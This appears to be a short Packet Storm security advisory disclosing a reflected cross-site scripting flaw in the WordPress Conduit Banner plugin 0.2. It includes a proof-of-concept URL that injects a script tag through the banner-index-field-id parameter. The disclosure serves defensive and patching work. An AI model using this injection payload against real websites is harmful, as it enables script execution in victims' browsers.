WordPress Conduit Banner plugin version 0.2 suffers from a reflective cross site scripting vulnerability.
438663f9feb4dc0c03a9ac0fbe3bdf84a8b2920ce861b54323e1bf53e98450f8------------------------------------------------------------------------
Software................WordPress Conduit Banner Plugin 0.2
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.conduit.com/widget
Release Date............1/24/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in WordPress Conduit
Banner Plugin 0.2 can be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/wordpress/wp-content/plugins/conduit-banner-selector/conduit-banner-selector-banners.php?category-field-id=&category-id=120x240&page=&banner-index-field-id=')"/><script>alert(0)</script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed